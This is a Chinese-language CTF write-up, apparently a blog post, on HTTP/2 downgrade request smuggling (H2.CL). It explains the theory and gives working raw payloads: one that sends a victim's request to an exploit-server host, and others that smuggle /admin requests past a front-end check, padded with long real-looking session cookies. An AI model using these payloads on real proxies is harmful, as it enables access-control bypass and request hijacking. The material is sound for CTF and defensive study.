CTF题型 Http2降级走私原理分析&例题分享
文章目录
- CTF题型 Http2降级走私原理分析&例题分享
- HTTP/2请求走私的产生
- 回顾一下Http请求走私原理
- Http2请求的消息划分
- 实际生产环境的限制
- 如何利用
- H2.CL
- 实验环境准备
- 例题分析
- H2.CL请求走私
- [GeekChanllenge 2023 Ez_Smuggling]
请先学习Http请求走私原理作为前置知识
https://blog.csdn.net/qq_39947980/article/details/136821139
HTTP/2请求走私的产生
回顾一下Http请求走私原理
请求走私本质上是利用不同服务器对请求长度头部(Content-Length)解析时产生的差异
Http2请求的消息划分
HTTP/2消息为一系列独立的通过网络发送的“帧”。每一帧前面都有一个明确的长度字段,告诉服务器要读入多少字节。因此,请求的长度是其帧长度的总和。
理论上由于以上因素被认为使其天生不受请求走私的影响。(二进制帧)
但在实际使用时,由于广泛但危险的HTTP/2降级做法,情况往往并非如此
实际生产环境的限制
由于HTTP/2相对较新,支持它的Web服务器必须与仅使用HTTP/1的传统后端进行通信。因此,前端服务器使用HTTP/1语法重写每个传入的HTTP/2请求已成为一种常见做法。然后,该“降级”请求被转发到相关的后端服务器。
降级做法 极其常见是 许多流行的反向代理服务的默认行为
由于HTTP2不是特别成熟,一般支持HTTP2的web服务器仍然会与只支持HTTP1的后端基础设施进行通信。
所以尽管前端服务器与客户端使用HTTP2,在将请求转发到后端时将请求重写为HTTP1。当只支持HTTP1的后端发出 响应时,前端会把它重写为HTTP2返回给客户端。
如何利用
降级过程涉及到 http2---->http1.1重写,重写后造成歧义
H2.CL
在降级期间,前端服务器通常会加入一个HTTP1中的请求头
Content-Length,它的大小根据HTTP2内置长度机制来获取。但是如果在降级前HTTP2请求中就已经有了
Content-Length,那么该字段在Http2MultiplexHandler向上传播时不会被验证,它在重写HTTP2的时候直接利用。因此与HTTP1中的
TE.CL一样,我们可以利用Content-Length来误导前端服务器,固定请求结束的位置。从而进行走私。
就跟Http请求走私差不多(前端都要)
无非 我们这次仅关注后端 的 解析类型,然后想办法进行"缓存"
但是实际操作有许多细节问题
实验环境准备
关闭自动更新长度
打开Http2 重载
协议改为HTTP/2
例题分析
H2.CL请求走私
实验环境:https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-cl-request-smuggling
POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0
POST /exploit HTTP/1.1
Host: exploit-0a0f00a304f12eda80540c60018400c1.exploit-server.net
Content-Length: 5
x=1
我希望大家注意这
Content-Length: 5
x=1
[我是换行]
为什么加换行?
原因: Http消息头 的结束用 trailer 签名 代表消息的结束
明明是3个字符为什么是5?(和上篇文章的TE-CL例题类似)
因为需要把下一个数据包进来的请求头给挤掉,不然后端会认为是两个请求
只要比它原本长度大就可以了
可以是 5,6,7,8,9…(最好大一点点)
多尝试几次,成功触发302重定向(有点奇怪,必须访问/resources才可触发http2降级,怀疑是靶场问题)
非常玄学 多尝试几次
[GeekChanllenge 2023 Ez_Smuggling]
和上题思路基本一模一样 暗示用Http2做了一个代理服务器
我们需要先注册一个账号
有题目暗示可得 前端服务器做了验证
尝试Http2降级走私 绕过前端服务器限制
Http2-CL 截断 缓存进行走私
因为这里是登录后进入blog 需要携带Cookie
构造payload
GET / HTTP/2
Host: 23.94.38.86:9500
Cookie: daabb154c8599c7bc986980b51a1112e_ssl=5eacd496-1186-47e1-ae90-372cff2e142d.ADUWPhFE0c3m6ASGxnWuBwx6iY4; order=id%20desc; serverType=nginx; sites_path=/www/wwwroot; site_model=php; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22181****6657%22%7D%7D; pro_end=-1; ltd_end=-1; crontab_model=crontab; distribution=ubuntu; force=0; soft_remarks=%7B%22list%22%3A%5B%22%u66F4%u6362%u6388%u6743IP%22%2C%225%u5206%u949F%u6781%u901F%u54CD%u5E94%22%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%2C%2230+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%2C%2220+%u4F01%u4E1A%u7248%u4E13%u4EAB%u529F%u80FD%22%2C%221000%u6761%u514D%u8D39%u77ED%u4FE1%uFF08%u5E74%u4ED8%uFF09%22%2C%222%u5F20SSL%u5546%u7528%u8BC1%u4E66%uFF08%u5E74%u4ED8%uFF09%22%2C%22%u4E13%u4EAB%u4F01%u4E1A%u670D%u52A1%u7FA4%uFF08%u5E74%u4ED8%uFF09%22%5D%2C%22pro_list%22%3A%5B%22%u66F4%u6362%u6388%u6743IP%22%2C%22%u5BA2%u670D%u4F18%u5148%u54CD%u5E94%22%2C%2215+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%2C%22%u5546%u7528%u9632%u706B%u5899%u6388%u6743%22%5D%2C%22kfqq%22%3A%223007255432%22%2C%22kf%22%3A%22http%3A//q.url.cn/CDfQPS%3F_type%3Dwpa%26qidian%3Dtrue%22%2C%22qun%22%3A%22%22%2C%22activity_list%22%3A%5B%22%3Cspan%20style%3D%5C%22color%3A%23D98704%3Bpadding-right%3A10px%5C%22%3E618%u7279%u60E0%u6D3B%u52A8%uFF0C6%u67089%u65E5-%206%u670818%u65E5%uFF0C%u6700%u9AD8%u51CF15000%u5143%3C/span%3E%3Ca%20style%3D%5C%22text-decoration%3Anone%3B%5C%22%20href%3D%5C%22https%3A//www.bt.cn/618%5C%22%20rel%3D%5C%22noreferrer%5C%22%20%20target%3D%5C%22_blank%5C%22%20class%3D%5C%22btlink%5C%22%3E%u70B9%u51FB%u7ACB%u5373%u67E5%u770B%3E%3E%3C/a%3E%22%5D%2C%22kf_list%22%3A%5B%7B%22qq%22%3A%223007255432%22%2C%22kf%22%3A%22http%3A//q.url.cn/CDfQPS%3F_type%3Dwpa%26qidian%3Dtrue%22%7D%2C%7B%22qq%22%3A%222927440070%22%2C%22kf%22%3A%22http%3A//wpa.qq.com/msgrd%3Fv%3D3%26uin%3D2927440070%26site%3Dqq%26menu%3Dyes%26from%3Dmessage%26isappinstalled%3D0%22%7D%5D%2C%22wx_list%22%3A%5B%7B%22ps%22%3A%22%u5728%u7EBF%u5BA2%u670D%22%2C%22kf%22%3A%22https%3A//www.bt.cn/new/wechat_customer%22%7D%5D%2C%22vips_list%22%3A%7B%22%u591A%u5BF9%u4E00%u6280%u672F%u652F%u6301%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A0%2C%22vltd%22%3A1%7D%2C%22%u5168%u5E745%u6B21%u5B89%u5168%u6392%u67E5%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A0%2C%22vltd%22%3A1%7D%2C%225%u5206%u949F%u6025%u901F%u54CD%u5E94%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2230+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2220+%u4F01%u4E1A%u7248%u4E13%u4EAB%u529F%u80FD%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%221000%u6761%u514D%u8D39%u77ED%u4FE1%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%222%u5F20SSL%u5546%u7528%u8BC1%u4E66%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u4E13%u4EAB%u4F01%u4E1A%u670D%u52A1%u7FA4%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22WAF%u9632%u706B%u5899%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u66F4%u6362%u6388%u6743IP%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u5BA2%u670D%u4F18%u5148%u54CD%u5E94%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2215+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%7D%7D; pnull=1; p5=1; p6=1; p13=1; p7=1; p8=1; p12=1; p10=1; p-1=1; is_install=true; commandInputViewUUID=cs6izRF7Z43t4nL; rank=list; file_recycle_status=true; load_page=1; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true; p0=1; db_page_model=mysql; backup_path=/www/backup; site_type=0; load_search=undefined; softType=-1; load_type=-1; Path=/var/lib/docker/overlay2/cd3f019a4ba89a8844ba3e023e02f8807c0e0924ee78418512415ec686aabaa0/merged; 092ca415a3d9a29ab5e6f05cf346468f_ssl=a3291ea8-1e53-4c71-95f1-df1f40b0efce.URfOxwUUe6bSrkOmb1rHZJRJkA4; lastScanTime=2024/03/15%2009%3A56%3A08; session=MTcxMDgzNDYzNXx6dU1mdEhmZUZNZkNzSkllSzM4bUpvTUVVY0kxRW9tUGxZV1h1MDBkR0ZJcFNyUk5rV0cxV201dWM1Sm13MWJhOE1HbDNTc0Q0X09Yb1ZJaFlnQ3pHV21nWmxZWTJ4N098emO-rzB0e90DUmDq5-LIW_FfWulAxrcGA995iS0T1Lc=
Content-Length: 0
POST /admin HTTP/1.1
Cookie: daabb154c8599c7bc986980b51a1112e_ssl=5eacd496-1186-47e1-ae90-372cff2e142d.ADUWPhFE0c3m6ASGxnWuBwx6iY4; order=id%20desc; serverType=nginx; sites_path=/www/wwwroot; site_model=php; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22181****6657%22%7D%7D; pro_end=-1; ltd_end=-1; crontab_model=crontab; distribution=ubuntu; force=0; soft_remarks=%7B%22list%22%3A%5B%22%u66F4%u6362%u6388%u6743IP%22%2C%225%u5206%u949F%u6781%u901F%u54CD%u5E94%22%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%2C%2230+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%2C%2220+%u4F01%u4E1A%u7248%u4E13%u4EAB%u529F%u80FD%22%2C%221000%u6761%u514D%u8D39%u77ED%u4FE1%uFF08%u5E74%u4ED8%uFF09%22%2C%222%u5F20SSL%u5546%u7528%u8BC1%u4E66%uFF08%u5E74%u4ED8%uFF09%22%2C%22%u4E13%u4EAB%u4F01%u4E1A%u670D%u52A1%u7FA4%uFF08%u5E74%u4ED8%uFF09%22%5D%2C%22pro_list%22%3A%5B%22%u66F4%u6362%u6388%u6743IP%22%2C%22%u5BA2%u670D%u4F18%u5148%u54CD%u5E94%22%2C%2215+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%2C%22%u5546%u7528%u9632%u706B%u5899%u6388%u6743%22%5D%2C%22kfqq%22%3A%223007255432%22%2C%22kf%22%3A%22http%3A//q.url.cn/CDfQPS%3F_type%3Dwpa%26qidian%3Dtrue%22%2C%22qun%22%3A%22%22%2C%22activity_list%22%3A%5B%22%3Cspan%20style%3D%5C%22color%3A%23D98704%3Bpadding-right%3A10px%5C%22%3E618%u7279%u60E0%u6D3B%u52A8%uFF0C6%u67089%u65E5-%206%u670818%u65E5%uFF0C%u6700%u9AD8%u51CF15000%u5143%3C/span%3E%3Ca%20style%3D%5C%22text-decoration%3Anone%3B%5C%22%20href%3D%5C%22https%3A//www.bt.cn/618%5C%22%20rel%3D%5C%22noreferrer%5C%22%20%20target%3D%5C%22_blank%5C%22%20class%3D%5C%22btlink%5C%22%3E%u70B9%u51FB%u7ACB%u5373%u67E5%u770B%3E%3E%3C/a%3E%22%5D%2C%22kf_list%22%3A%5B%7B%22qq%22%3A%223007255432%22%2C%22kf%22%3A%22http%3A//q.url.cn/CDfQPS%3F_type%3Dwpa%26qidian%3Dtrue%22%7D%2C%7B%22qq%22%3A%222927440070%22%2C%22kf%22%3A%22http%3A//wpa.qq.com/msgrd%3Fv%3D3%26uin%3D2927440070%26site%3Dqq%26menu%3Dyes%26from%3Dmessage%26isappinstalled%3D0%22%7D%5D%2C%22wx_list%22%3A%5B%7B%22ps%22%3A%22%u5728%u7EBF%u5BA2%u670D%22%2C%22kf%22%3A%22https%3A//www.bt.cn/new/wechat_customer%22%7D%5D%2C%22vips_list%22%3A%7B%22%u591A%u5BF9%u4E00%u6280%u672F%u652F%u6301%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A0%2C%22vltd%22%3A1%7D%2C%22%u5168%u5E745%u6B21%u5B89%u5168%u6392%u67E5%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A0%2C%22vltd%22%3A1%7D%2C%225%u5206%u949F%u6025%u901F%u54CD%u5E94%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2230+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2220+%u4F01%u4E1A%u7248%u4E13%u4EAB%u529F%u80FD%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%221000%u6761%u514D%u8D39%u77ED%u4FE1%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%222%u5F20SSL%u5546%u7528%u8BC1%u4E66%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u4E13%u4EAB%u4F01%u4E1A%u670D%u52A1%u7FA4%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22WAF%u9632%u706B%u5899%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u66F4%u6362%u6388%u6743IP%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u5BA2%u670D%u4F18%u5148%u54CD%u5E94%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2215+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%7D%7D; pnull=1; p5=1; p6=1; p13=1; p7=1; p8=1; p12=1; p10=1; p-1=1; is_install=true; commandInputViewUUID=cs6izRF7Z43t4nL; rank=list; file_recycle_status=true; load_page=1; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true; p0=1; db_page_model=mysql; backup_path=/www/backup; site_type=0; load_search=undefined; softType=-1; load_type=-1; Path=/var/lib/docker/overlay2/cd3f019a4ba89a8844ba3e023e02f8807c0e0924ee78418512415ec686aabaa0/merged; 092ca415a3d9a29ab5e6f05cf346468f_ssl=a3291ea8-1e53-4c71-95f1-df1f40b0efce.URfOxwUUe6bSrkOmb1rHZJRJkA4; lastScanTime=2024/03/15%2009%3A56%3A08; session=MTcxMDgzNDYzNXx6dU1mdEhmZUZNZkNzSkllSzM4bUpvTUVVY0kxRW9tUGxZV1h1MDBkR0ZJcFNyUk5rV0cxV201dWM1Sm13MWJhOE1HbDNTc0Q0X09Yb1ZJaFlnQ3pHV21nWmxZWTJ4N098emO-rzB0e90DUmDq5-LIW_FfWulAxrcGA995iS0T1Lc=
Content-Length: 5
x=1
[我是换行] //原因:终止块后是一个 trailer,由 0 或多个实体头组成,可以用来存放对数据的数字签名等
成功进行Http2降级走私
换一种方式 用GET方法
Content-Length: 0
GET /admin HTTP/1.1
Cookie: daabb154c8599c7bc986980b51a1112e_ssl=5eacd496-1186-47e1-ae90-372cff2e142d.ADUWPhFE0c3m6ASGxnWuBwx6iY4; order=id%20desc; serverType=nginx; sites_path=/www/wwwroot; site_model=php; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22181****6657%22%7D%7D; pro_end=-1; ltd_end=-1; crontab_model=crontab; distribution=ubuntu; force=0; soft_remarks=%7B%22list%22%3A%5B%22%u66F4%u6362%u6388%u6743IP%22%2C%225%u5206%u949F%u6781%u901F%u54CD%u5E94%22%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%2C%2230+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%2C%2220+%u4F01%u4E1A%u7248%u4E13%u4EAB%u529F%u80FD%22%2C%221000%u6761%u514D%u8D39%u77ED%u4FE1%uFF08%u5E74%u4ED8%uFF09%22%2C%222%u5F20SSL%u5546%u7528%u8BC1%u4E66%uFF08%u5E74%u4ED8%uFF09%22%2C%22%u4E13%u4EAB%u4F01%u4E1A%u670D%u52A1%u7FA4%uFF08%u5E74%u4ED8%uFF09%22%5D%2C%22pro_list%22%3A%5B%22%u66F4%u6362%u6388%u6743IP%22%2C%22%u5BA2%u670D%u4F18%u5148%u54CD%u5E94%22%2C%2215+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%2C%22%u5546%u7528%u9632%u706B%u5899%u6388%u6743%22%5D%2C%22kfqq%22%3A%223007255432%22%2C%22kf%22%3A%22http%3A//q.url.cn/CDfQPS%3F_type%3Dwpa%26qidian%3Dtrue%22%2C%22qun%22%3A%22%22%2C%22activity_list%22%3A%5B%22%3Cspan%20style%3D%5C%22color%3A%23D98704%3Bpadding-right%3A10px%5C%22%3E618%u7279%u60E0%u6D3B%u52A8%uFF0C6%u67089%u65E5-%206%u670818%u65E5%uFF0C%u6700%u9AD8%u51CF15000%u5143%3C/span%3E%3Ca%20style%3D%5C%22text-decoration%3Anone%3B%5C%22%20href%3D%5C%22https%3A//www.bt.cn/618%5C%22%20rel%3D%5C%22noreferrer%5C%22%20%20target%3D%5C%22_blank%5C%22%20class%3D%5C%22btlink%5C%22%3E%u70B9%u51FB%u7ACB%u5373%u67E5%u770B%3E%3E%3C/a%3E%22%5D%2C%22kf_list%22%3A%5B%7B%22qq%22%3A%223007255432%22%2C%22kf%22%3A%22http%3A//q.url.cn/CDfQPS%3F_type%3Dwpa%26qidian%3Dtrue%22%7D%2C%7B%22qq%22%3A%222927440070%22%2C%22kf%22%3A%22http%3A//wpa.qq.com/msgrd%3Fv%3D3%26uin%3D2927440070%26site%3Dqq%26menu%3Dyes%26from%3Dmessage%26isappinstalled%3D0%22%7D%5D%2C%22wx_list%22%3A%5B%7B%22ps%22%3A%22%u5728%u7EBF%u5BA2%u670D%22%2C%22kf%22%3A%22https%3A//www.bt.cn/new/wechat_customer%22%7D%5D%2C%22vips_list%22%3A%7B%22%u591A%u5BF9%u4E00%u6280%u672F%u652F%u6301%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A0%2C%22vltd%22%3A1%7D%2C%22%u5168%u5E745%u6B21%u5B89%u5168%u6392%u67E5%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A0%2C%22vltd%22%3A1%7D%2C%225%u5206%u949F%u6025%u901F%u54CD%u5E94%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2230+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2220+%u4F01%u4E1A%u7248%u4E13%u4EAB%u529F%u80FD%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%221000%u6761%u514D%u8D39%u77ED%u4FE1%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%222%u5F20SSL%u5546%u7528%u8BC1%u4E66%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u4E13%u4EAB%u4F01%u4E1A%u670D%u52A1%u7FA4%28%u5E74%u4ED8%29%22%3A%7B%22pro%22%3A0%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22WAF%u9632%u706B%u5899%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u66F4%u6362%u6388%u6743IP%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%22%u5BA2%u670D%u4F18%u5148%u54CD%u5E94%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2215+%u6B3E%u4ED8%u8D39%u63D2%u4EF6%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%2C%2215%u5929%u65E0%u7406%u7531%u9000%u6B3E%22%3A%7B%22pro%22%3A1%2C%22ltd%22%3A1%2C%22vltd%22%3A1%7D%7D%7D; pnull=1; p5=1; p6=1; p13=1; p7=1; p8=1; p12=1; p10=1; p-1=1; is_install=true; commandInputViewUUID=cs6izRF7Z43t4nL; rank=list; file_recycle_status=true; load_page=1; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true; p0=1; db_page_model=mysql; backup_path=/www/backup; site_type=0; load_search=undefined; softType=-1; load_type=-1; Path=/var/lib/docker/overlay2/cd3f019a4ba89a8844ba3e023e02f8807c0e0924ee78418512415ec686aabaa0/merged; 092ca415a3d9a29ab5e6f05cf346468f_ssl=a3291ea8-1e53-4c71-95f1-df1f40b0efce.URfOxwUUe6bSrkOmb1rHZJRJkA4; lastScanTime=2024/03/15%2009%3A56%3A08; session=MTcxMDgzNDYzNXx6dU1mdEhmZUZNZkNzSkllSzM4bUpvTUVVY0kxRW9tUGxZV1h1MDBkR0ZJcFNyUk5rV0cxV201dWM1Sm13MWJhOE1HbDNTc0Q0X09Yb1ZJaFlnQ3pHV21nWmxZWTJ4N098emO-rzB0e90DUmDq5-LIW_FfWulAxrcGA995iS0T1Lc=
[我是换行] //消息头和数据体 必须的结构
[我是换行] //代表 消息的结束 终止块后是一个 trailer,由 0 或多个实体头组成,可以用来存放对数据的数字签名等
同样可以拿到flag
